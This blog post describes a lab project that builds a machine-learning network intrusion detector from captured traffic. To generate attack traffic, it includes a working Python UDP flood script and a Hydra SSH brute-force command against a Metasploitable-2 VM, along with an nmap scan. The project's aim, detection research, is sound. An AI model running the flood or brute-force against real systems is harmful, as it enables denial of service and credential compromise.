
Basic Machine Learning : Network Anomaly Detection

by Mayank Nauni · October 13, 2021

Disclaimer: This note was written by me (Mayank Nauni) in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.

Special Thanks to Kenny Ong, my friend & course-mate at Singapore University of Technology and Design for collaborating with me on this mini-project and Tao Liu for his excellent blog on the same subject https://www.linkedin.com/pulse/build-machine-learning-model-network-flow-tao-liu/

Introduction

The number of network attacks keeps rising as advances in Internet technologies continue to improve our lives, and in recent years network intrusion detection has become a significant research issue in the industry.

The term network anomaly detection refers to the identification of rare and unexpected bursts of activity within a computer network. In this context, a network anomaly is a deliberate intrusion attempt aimed at (i) accessing information, (ii) manipulating information, or (iii) rendering a computer system or network unreliable or unusable.

In this project, to provide a proper setup for anomaly detection, the concept of normality needs to be grasped: the captured traffic has to be defined as either normal or anomalous. Using tools to create datasets helps us produce more findings in the area of network intrusion detection methods and systems (NIDS).

Lab Setup and Topology

The network topology is set up using GNS3 Emulator as a tool to simulate the network anomaly detection system. The following are the devices and virtual machines (VM).

Switch (Gateway) Based on Cisco IOS image (12.4) – 10.0.2.1
Kali Attacker VM – 2021.2 release – 10.0.2.15
Metasploitable-2 VM – 10.0.2.2
SIEM VM – 10.0.2.30

GitHub Repo: https://github.com/mayanknauni/ML_Cybersecurity

Topology Brief:

The topology was created on the GNS3 network emulator, which uses a real IOS image (version 12.4) for the Cisco switch. The Kali VM (2021.2 release) and the Metasploitable VM were created on VirtualBox, which is integrated with GNS3. The VMs are connected to the switch using a generic driver (UDP tunnel).

On the switch end, we created a SPAN session to capture all traffic on the network port connected to the Metasploitable VM and redirect it to the SIEM VM. We use “tshark” on the SIEM VM to convert the captured “.pcap” files to “.csv” files.

Below is the GNS3 topology that we created and used for this project. The SIEM was an additional VM used to sniff the data during the attacks and to see how SIEM software perceives them.

[Figure: GNS3 topology]

Strategy

We set out to build a machine learning model for classifying packet flows captured with Wireshark. The model was prepared according to the strategy below:

Our strategy is to execute four attacks, elaborated in the Methods section, and manually capture packets for them on the Metasploitable server end. Each capture is labelled accordingly, and later all four captures are aggregated with the benign network capture to form a dataset.

The dataset is then sanitized using a Python script, which checks the dataset for NaN values and replaces the empty cells with 0.

We also replaced the IP addresses and TCP flag values with integers so that our algorithms can process them.

Methods

Creating the datasets involves generating normal (benign) communication between the clients and servers through Python scripts, and collecting all traffic with Wireshark as the packet capture tool.

The 4 kinds of attacks implemented and run from the malicious clients are as follows:

DDoS
Brute force
Probe
SQL

From these attacks, benign and malicious traffic is merged and labeled for classification and further analysis via Weka.

Attack Details

The attacks were carried out at the timestamps below:

Start Time	End Time	Exploit	Remark
8:05 pm	8:15 pm	Benign	Simulated normal web access by running curl every 5 seconds with watch: watch -n 5 "curl http://10.0.2.2"
8:16 pm	8:20 pm	DDOS	ddos.py
9:00 pm	9:06 pm	Probe	nmap
9:15 pm	9:20 pm	Bruteforce	Hydra
9:30 pm	9:37 pm	SQL	Metasploitable

Benign Flow Capture

We simulated normal web access by running curl every 5 seconds with watch, and captured the packets:

Command: watch -n 5 "curl http://10.0.2.2"
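The same periodic request can also be scripted in Python, which is handy when the benign traffic needs to be generated for a fixed number of requests. This is only a sketch, not part of the project's scripts: the names fetch_status and generate_benign_traffic are hypothetical, and the 5-second interval simply mirrors the watch command above.

```python
import time
from urllib.request import urlopen


def fetch_status(url):
    """Request the URL once and return the HTTP status code."""
    with urlopen(url, timeout=5) as response:
        return response.status


def generate_benign_traffic(url, interval=5.0, count=3,
                            fetch=fetch_status, sleep=time.sleep):
    """Request `url` `count` times, pausing `interval` seconds between requests.

    `fetch` and `sleep` are parameters so the loop can be exercised
    without a network or real delays.
    """
    statuses = []
    for i in range(count):
        statuses.append(fetch(url))
        if i < count - 1:
            sleep(interval)
    return statuses
```

Calling generate_benign_traffic("http://10.0.2.2", count=120) would issue roughly ten minutes of requests, similar in spirit to the benign capture window.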

DDoS Attack and packet capture

We used the below-mentioned python code to simulate DDoS attack on Metasploitable2

import sys
import os
import time
import socket
import random
# Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############

os.system("clear")
os.system("figlet DDos Attack")
print
print
ip = raw_input("IP Target : ")
port = input("Port : ")

os.system("clear")
os.system("figlet Attack Starting")
time.sleep(3)
sent = 0
while True:
    sock.sendto(bytes, (ip, port))
    sent = sent + 1
    port = port + 1
    print "Sent %s packet to %s through port:%s" % (sent, ip, port)
    if port == 65534:
        port = 1

Command: python2 ddos.py


The attack runs indefinitely until we interrupt the script.

Nmap Probe and Packet Capture

We used the nmap command below to initiate a probe on Metasploitable2:

Command: nmap -sC -sV -oA project 10.0.2.2

The packets were captured during the time when the scan started and completed successfully.


Bruteforce and Packet Capture

We used Hydra to launch a brute-force attack on port 22 by SSH login attempts

Command: sudo hydra -V -f -t 4 -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.2


Feature Extraction (using T-Shark)

Command:

tshark -r http.pcap -T fields -E header=y -E separator=, -E quote=d -E occurrence=f -e ip.src -e ip.dst -e ip.len -e ip.flags.df -e ip.flags.mf -e ip.fragment -e ip.fragment.count -e ip.fragments -e ip.ttl -e ip.proto -e tcp.window_size -e tcp.ack -e tcp.seq -e tcp.len -e tcp.stream -e tcp.urgent_pointer -e tcp.flags -e tcp.analysis.ack_rtt -e tcp.segments -e tcp.reassembled.length -e http.request -e udp.port -e frame.time_relative -e frame.time_delta -e tcp.time_relative -e tcp.time_delta > benign.csv

We selected the 26 features below from the Wireshark capture:

Features	Description	Type
ip.src	Source Address	IPv4 address
ip.dst	Destination Address	IPv4 address
ip.len	Total Length	Unsigned integer, 2 bytes
ip.flags.df	Don’t fragment	Boolean
ip.flags.mf	More fragments	Boolean
ip.fragment	IPv4 Fragment	Frame number
ip.fragment.count	Fragment count	Unsigned integer, 4 bytes
ip.fragments	IPv4 Fragments	Sequence of bytes
ip.ttl	Time to Live	Unsigned integer, 1 byte
ip.proto	Protocol	Unsigned integer, 1 byte
tcp.window_size	Calculated window size	Unsigned integer, 4 bytes
tcp.ack	Acknowledgment Number	Unsigned integer, 4 bytes
tcp.seq	Sequence Number	Unsigned integer, 4 bytes
tcp.len	TCP Segment Len	Unsigned integer, 4 bytes
tcp.stream	Stream index	Unsigned integer, 4 bytes
tcp.urgent_pointer	Urgent Pointer	Unsigned integer, 2 bytes
tcp.flags	Flags	Unsigned integer, 2 bytes
tcp.analysis.ack_rtt	The RTT to ACK the segment was	Time offset
tcp.segments	Reassembled TCP Segments	Label
tcp.reassembled.length	Reassembled TCP length	Unsigned integer, 4 bytes
http.request	Request	Boolean
udp.port	Source or Destination Port	Unsigned integer, 2 bytes
frame.time_relative	Time since reference or first frame	Time offset
frame.time_delta	Time delta from previous captured frame	Time offset
tcp.time_relative	Time since first frame in this TCP stream	Time offset
tcp.time_delta	Time since previous frame in this TCP stream	Time offset
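If the same extraction has to be repeated for every capture, the tshark call can be wrapped in a small Python helper. This is a minimal sketch rather than one of the project's scripts: build_tshark_command and extract_features are hypothetical names, and it assumes tshark is available on the PATH. The options and the field list are the ones from the command above.

```python
import subprocess

# The 26 fields listed in the table above, in the same order.
FIELDS = (
    "ip.src", "ip.dst", "ip.len", "ip.flags.df", "ip.flags.mf",
    "ip.fragment", "ip.fragment.count", "ip.fragments", "ip.ttl", "ip.proto",
    "tcp.window_size", "tcp.ack", "tcp.seq", "tcp.len", "tcp.stream",
    "tcp.urgent_pointer", "tcp.flags", "tcp.analysis.ack_rtt", "tcp.segments",
    "tcp.reassembled.length", "http.request", "udp.port",
    "frame.time_relative", "frame.time_delta",
    "tcp.time_relative", "tcp.time_delta",
)


def build_tshark_command(pcap_path, fields=FIELDS):
    """Return the tshark argument list that exports `fields` as CSV."""
    cmd = ["tshark", "-r", pcap_path, "-T", "fields",
           "-E", "header=y", "-E", "separator=,",
           "-E", "quote=d", "-E", "occurrence=f"]
    for field in fields:
        cmd += ["-e", field]
    return cmd


def extract_features(pcap_path, csv_path):
    """Run tshark on one capture and write its CSV output to `csv_path`."""
    with open(csv_path, "w") as out_file:
        subprocess.run(build_tshark_command(pcap_path),
                       stdout=out_file, check=True)
```

For example, extract_features("http.pcap", "benign.csv") would reproduce the command above for the benign capture.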

Data Clean-up

Command: python3 step1_cleanup.py benign.csv

The script below takes the supplied CSV file (benign.csv in this case), fills all null values with 0, and converts non-integer fields such as tcp.flags, ip.dst and ip.src into integers.

#!/usr/bin/env python3

import ipaddress
import sys

import pandas as pd

filename = sys.argv[1]
file1 = pd.read_csv(filename)

# Step 1: replace all null values with 0
update_file = file1.fillna(0)
# print(update_file.isnull().sum())

# Step 2: convert tcp.flags (hex string) and ip.dst / ip.src (dotted quad) to integers
update_file['tcp.flags'] = update_file['tcp.flags'].apply(lambda x: int(str(x), 16))
update_file['ip.dst'] = update_file['ip.dst'].apply(lambda x: int(ipaddress.IPv4Address(x)))
update_file['ip.src'] = update_file['ip.src'].apply(lambda x: int(ipaddress.IPv4Address(x)))

# Write the cleaned data to updated_<filename>
update_file.to_csv('updated_' + filename, index=False)

The command above generates a new file with the cleaned-up data, named “updated_benign.csv”.
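The two conversions can be tried in isolation to see what the integers look like. The sketch below is a slightly more defensive variant and not the script's own code: the helper names flags_to_int and ip_to_int are hypothetical, and mapping blank or zero-filled cells to 0 is our assumption, mirroring the fill-with-0 step.

```python
import ipaddress

# Cell values that stand for "no value" after the null-filling step (assumption).
_EMPTY = ("", "0", "0.0", "nan")


def flags_to_int(value):
    """Convert a tshark tcp.flags value such as '0x0018' to an integer."""
    text = str(value).strip()
    if text in _EMPTY:
        return 0
    return int(text, 16)


def ip_to_int(value):
    """Convert a dotted-quad IPv4 address such as '10.0.2.2' to an integer."""
    text = str(value).strip()
    if text in _EMPTY:
        return 0
    return int(ipaddress.IPv4Address(text))


print(flags_to_int("0x0018"))  # PSH+ACK
print(ip_to_int("10.0.2.2"))   # the Metasploitable-2 address from the lab
```

Handling the empty case explicitly avoids a ValueError when a column contains no TCP packets at all and pandas reads it as floating point.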

Data Labelling

We use another python script to add another column in the file “updated_benign.csv” with the name “label” and specify the label with the command below: –

Command: python2 step2_labelling.py benign updated_benign.csv

import sys
import csv

label = sys.argv[1]
file_name = sys.argv[2]

# Read the cleaned CSV and append a 'label' column to every row
with open(file_name) as in_file:
    content = csv.reader(in_file)
    header = next(content)
    header.append('label')
    rows = [header]
    for item in content:
        item.append(label)
        rows.append(item)

# Write the labelled rows to <label>_<file_name>
with open(label + '_' + file_name, 'w') as new_file:
    writer = csv.writer(new_file, lineterminator='\n')
    writer.writerows(rows)

It creates a new file named benign_updated_benign.csv, where the leading “benign” is the label we passed to the Python script.

This step is repeated for all four attacks, which gives five labelled CSV files in total, including the benign one:

benign_updated_benign.csv
bruteforce_updated_bruteforce.csv
ddos_updated_ddos.csv
probe_updated_nmap.csv
sqlattack_updated_sqlattack.csv

We aggregate the above five files into our common dataset called “master_dataset.csv”. We use this dataset for the analysis in Weka.
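The aggregation itself can be done in many ways. As one possible sketch, the labelled files can be concatenated with the standard csv module, keeping a single header row. The function name merge_labelled_csvs is hypothetical, and the sketch assumes that every input file has exactly the same header.

```python
import csv


def merge_labelled_csvs(input_paths, output_path):
    """Concatenate CSV files that share a header; return the number of data rows."""
    header = None
    rows_written = 0
    with open(output_path, "w", newline="") as out_file:
        writer = csv.writer(out_file, lineterminator="\n")
        for path in input_paths:
            with open(path, newline="") as in_file:
                reader = csv.reader(in_file)
                file_header = next(reader)
                if header is None:
                    # The first file defines the header of the merged dataset.
                    header = file_header
                    writer.writerow(header)
                elif file_header != header:
                    raise ValueError("Header mismatch in %s" % path)
                for row in reader:
                    writer.writerow(row)
                    rows_written += 1
    return rows_written
```

Refusing to merge files with different headers is a deliberate choice here: a silently shifted column would corrupt every feature to its right.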

Analysis on Weka

We opened “master_dataset.csv” in Weka for analysis. A glimpse of the label attribute is below:

[Figure: label attribute in Weka]

Feature Evaluation

We ran ReliefFAttributeEval, which yielded the results below:

[Figure: ReliefFAttributeEval output in Weka]

The top 15 attributes out of 26 are ranked below:

Rank	Attributes
1	tcp.stream
2	ip.flags.df
3	tcp.flags
4	ip.proto
5	tcp.window_size
6	frame.time_relative
7	ip.len
8	ip.flags.mf
9	udp.port
10	ip.fragment.count
11	tcp.len
12	tcp.analysis.ack_rtt
13	ip.dst
14	ip.fragment
15	tcp.ack

Running Different ML Models

J48


Correctly Classified Instances 16204 98.4088 %

Incorrectly Classified Instances 262 1.5912 %

J48 Decision Tree View

MLP

Correctly Classified Instances 16148 98.0687 %

Incorrectly Classified Instances 318 1.9313 %

SMO

Correctly Classified Instances 15815 96.0464 %

Incorrectly Classified Instances 651 3.9536 %

Naïve Bayes

Correctly Classified Instances 15216 92.4086 %

Incorrectly Classified Instances 1250 7.5914 %

Summary of Weka Models

Based on the outputs above, the J48 decision tree model gave us the best accuracy, so we proceed to build a detection tool around it.

Model	Accuracy
J48	98.41%
MLP	98.07%
SMO	96.05%
Naïve Bayes	92.41%
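The percentages in the table follow directly from the instance counts that Weka reports: accuracy is the number of correctly classified instances divided by the total. A small sketch to reproduce the table from those counts (the names WEKA_COUNTS and accuracy_percent are ours, not Weka's):

```python
# (correctly classified, incorrectly classified) instances reported by Weka above
WEKA_COUNTS = {
    "J48": (16204, 262),
    "MLP": (16148, 318),
    "SMO": (15815, 651),
    "Naive Bayes": (15216, 1250),
}


def accuracy_percent(correct, incorrect):
    """Accuracy as a percentage of all classified instances."""
    return 100.0 * correct / (correct + incorrect)


for model, (correct, incorrect) in WEKA_COUNTS.items():
    print("%-12s %.2f%%" % (model, accuracy_percent(correct, incorrect)))

# Model with the highest accuracy
best_model = max(WEKA_COUNTS, key=lambda m: accuracy_percent(*WEKA_COUNTS[m]))
```

Every model was evaluated on the same 16466 instances, so the ranking by accuracy is the same as the ranking by correctly classified count.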

Building Offline Detection Tool

We used the below for building our offline detection tool: –

Python: 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0]
scipy: 1.6.0
numpy: 1.19.5
matplotlib: 3.4.3
pandas: 1.3.1
sklearn: 0.24.2

We’ve split our data into 3 datasets, one for training, another for validation, and the last one for testing. After running this program for the default dataset “master_dataset.csv”, we get the output below: –

We used the models below for comparison on accuracy: –

‘LR’ : Logistic Regression
‘LDA’: Linear Discriminant Analysis
‘KNN’: KNeighbors Classifier
‘CART’: Decision Tree Classifier

Command: python3 step3_train.py
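The three-way split mentioned above can be illustrated without any ML library. This is a sketch under stated assumptions, not the code of step3_train.py: the 60/20/20 proportions, the seed and the function name three_way_split are all hypothetical, since the article does not state the ratios used.

```python
import random


def three_way_split(rows, train_pct=60, validation_pct=20, seed=7):
    """Shuffle `rows` and split them into train, validation and test lists.

    Percentages are integers; whatever remains after the training and
    validation parts becomes the test set.
    """
    shuffled = list(rows)
    random.Random(seed).shuffle(shuffled)
    n_train = len(shuffled) * train_pct // 100
    n_validation = len(shuffled) * validation_pct // 100
    train = shuffled[:n_train]
    validation = shuffled[n_train:n_train + n_validation]
    test = shuffled[n_train + n_validation:]
    return train, validation, test
```

The models are fitted on the training part and compared on the validation part, while the test part is kept aside so that the final accuracy is measured on data that played no role in choosing the model.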

[Figure: output of step3_train.py]

We are using CART or Decision Tree, which is a white box type of ML algorithm. The time complexity of decision trees is a function of the number of records and number of attributes in the given data. Decision trees can handle high-dimensional data with good accuracy.
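To make the "white box" point concrete: a CART-style tree picks, at every node, the split that leaves the purest groups of labels, and Gini impurity is the default criterion of scikit-learn's DecisionTreeClassifier. Whether step3_train.py kept that default is an assumption on our side. The sketch below, with hypothetical helper names, computes the impurity of a group of labels and of a candidate split.

```python
from collections import Counter


def gini_impurity(labels):
    """Gini impurity of a list of class labels (0.0 means a pure group)."""
    total = len(labels)
    if total == 0:
        return 0.0
    return 1.0 - sum((count / total) ** 2 for count in Counter(labels).values())


def split_impurity(left, right):
    """Size-weighted Gini impurity of the two groups produced by a split."""
    total = len(left) + len(right)
    return (len(left) * gini_impurity(left)
            + len(right) * gini_impurity(right)) / total


mixed = ["benign", "benign", "probe", "probe"]
print(gini_impurity(mixed))                  # impurity before splitting
print(split_impurity(mixed[:2], mixed[2:]))  # impurity after a perfect split
```

Because every decision is a threshold on a single feature chosen this way, the resulting tree can be read and checked by hand, which is what makes it a white box.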

As seen from the output, CART was reported to have the maximum accuracy in the first comparison, i.e. 98.21%, which is very close to the 98.41% accuracy we observed in Weka.

The accuracy of the final testing dataset was 98.31%.

We saved our model using the joblib library as “finalized_DT_model.sav”.

Executing this model on a new dataset

We initiated a fresh probe, captured the data, converted it to CSV, labelled it as “unknown” and appended it to master_dataset.csv. We then ran the same model again and checked the confusion matrix. As seen below, the confusion matrix places all of the new probe's records in the fourth column, which is the probe class.
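How the confusion matrix is read can be shown with a tiny stand-alone example. This is a sketch with made-up predictions, not our actual results: the function confusion_matrix below is our own minimal version, and the label names and their alphabetical order are assumptions based on the labels used when building the dataset.

```python
from collections import Counter


def confusion_matrix(actual, predicted, labels):
    """Rows are actual labels, columns are predicted labels, in `labels` order."""
    counts = Counter(zip(actual, predicted))
    return [[counts[(a, p)] for p in labels] for a in labels]


# Assumed label names, sorted alphabetically so that "probe" is the fourth column.
LABELS = ["benign", "bruteforce", "ddos", "probe", "sqlattack", "unknown"]

# Illustrative data only: three "unknown" records, all predicted as probe.
actual = ["unknown", "unknown", "unknown", "benign", "benign"]
predicted = ["probe", "probe", "probe", "benign", "ddos"]

matrix = confusion_matrix(actual, predicted, LABELS)
for label, row in zip(LABELS, matrix):
    print("%-10s %s" % (label, row))
```

In this layout the row for “unknown” has all of its counts in the fourth column, which is the pattern described above for the fresh probe capture.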

[Figure: confusion matrix]

We also ran the amended master_dataset.csv through the Weka J48 model to confirm our results. As expected, it gave us similar results in the confusion matrix, which confirms that the prediction works as expected.

Results

We were able to produce a working detection model using a decision tree algorithm with an accuracy of 98.4%. The results of the tool coincided with the results produced by Weka, which indicates that the tool we created and the model we deployed produce consistent results.

Discussion

We first tried “CICFlowMeter” for feature extraction. It took us days just to get it running, as the majority of its dependencies are very old, and even once it was up and running it gave erroneous outputs for the same data across multiple iterations. For example, for a flow length of 2200 packets it produced output for only 101 packets, which made us switch to tshark instead.

We tried different ways of attacking the Metasploitable VM, but given the limited resources of our laptop the VMs would crash frequently, so we had to select attack methodologies that are not resource-intensive.

We have concluded that while our model's accuracy is very high, i.e. 98.4%, this is because the dataset we used is small, which introduced some bias. If we had to do this for a production environment with more infrastructure resources available, we would run the captures for days.

We have provided the files below as part of the submission.

Serial	File	Remark
1	step1_cleanup.py	For csv cleanup python3 step1_cleanup.py filename.csv
2	step2_labelling.py	For labelling the csv python2 step2_labelling.py benign updated_benign.csv
3	step3_train.py	For training and prediction (refers to static file master_dataset.csv) python3 step3_train.py
4	master_dataset.csv	Consolidated DataSet
5	Folder Wireshark Captures	Raw Attack Wireshark Captures
6	Folder Labelled Data	Individual attack CSV files
7	finalized_DT_model.sav	Saved ML Model
8	ddos.py	For DDoS simulation python2 ddos.py